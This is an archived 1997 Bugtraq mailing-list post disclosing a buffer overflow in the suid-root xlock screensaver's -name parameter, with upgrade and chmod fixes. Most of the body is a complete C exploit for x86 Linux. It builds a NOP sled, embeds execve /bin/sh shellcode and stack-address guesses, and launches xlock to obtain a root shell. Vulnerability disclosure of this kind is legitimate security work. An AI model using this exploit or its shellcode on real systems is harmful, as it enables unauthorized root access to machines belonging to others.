From - Tue Aug 05 09:43:30 1997
Return-Path: <owner-bugtraq@NETSPACE.ORG>
Received: from mwunix.mitre.org by smiley. (4.1/SMI-4.1)
	id AA23435; Sat, 26 Apr 97 18:51:06 EDT
Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100])
	by mwunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id SAA14608;
	Sat, 26 Apr 1997 18:51:41 -0400 (EDT)
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by mbunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id SAA01992;
	Sat, 26 Apr 1997 18:51:40 -0400 (EDT)
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <35705-9026>; Sat, 26 Apr 1997 18:42:39 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 3515876 for BUGTRAQ@NETSPACE.ORG; Sat, 26 Apr 1997 18:23:48
          -0400
Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by
          netspace.org (8.8.5/8.8.2) with ESMTP id SAA09010 for
          <BUGTRAQ@netspace.org>; Sat, 26 Apr 1997 18:12:04 -0400
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with
          ESMTP id <32922-9028>; Sat, 26 Apr 1997 18:16:10 -0400
Approved-By: aleph1@UNDERGROUND.ORG
Received: from nitro.0wned.org (root@0wned.org [204.50.58.21]) by netspace.org
          (8.8.5/8.8.2) with ESMTP id QAA29528 for <bugtraq@netspace.org>; Sat,
          26 Apr 1997 16:11:16 -0400
Received: from warrior.0wned.org (RFD.0wned.org [204.50.58.22]) by
          nitro.0wned.org (8.8.5/8.6.9) with SMTP id PAA03813 for
          <bugtraq@netspace.org>; Sat, 26 Apr 1997 15:15:01 -0400
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.91.970426160718.1940A-100000@warrior.0wned.org>
Date: 	Sat, 26 Apr 1997 16:16:05 -0400
Reply-To: George Staikos <staikos@0WNED.ORG>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: George Staikos <staikos@0WNED.ORG>
Subject:      Overflow in xlock
To: BUGTRAQ@NETSPACE.ORG
Status: RO
X-Mozilla-Status: 2001
Content-Length: 2453

There appears to be an exploitable buffer overflow in xlock, the X based
screensaver/locker.  Xlock is installed suid root on machines with
shadowed passwords.  I have verified this on xlock versions on AIX 4.x and
Linux (exploit for Linux posted below), but I cannot determine what
version I was using, as xlock does not seem to contain version information
in the binary and I don't have the original source.  The overflow is in
the -name parameter, and it is fixed in xlockmore-4.01, available on
sunsite in /pub/Linux/X11/screensavers/xlockmore-4.01.tgz .  Other
platforms have not been checked for this, and while this is an older
version of xlock, many systems seem to come preloaded with this version.
Also, xlock does not need to be suid root unless it is running on a
machine with shadowed passwords, so another possible fix it chmod u-s xlock.




/*   x86 XLOCK overflow exploit
     by cesaro@0wned.org 4/17/97

     Original exploit framework - lpr exploit

     Usage: make xlock-exploit
            xlock-exploit  <optional_offset>

     Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             996

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

int main(int argc, char *argv[])
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int dfltOFFSET = DEFAULT_OFFSET;

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                        "\xd7\xff\xff\xff/bin/sh";
   int i;

   if (argc > 1)
      dfltOFFSET = atoi(argv[1]);
   else printf("You can specify another offset as a parameter if you need...\n");

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + dfltOFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}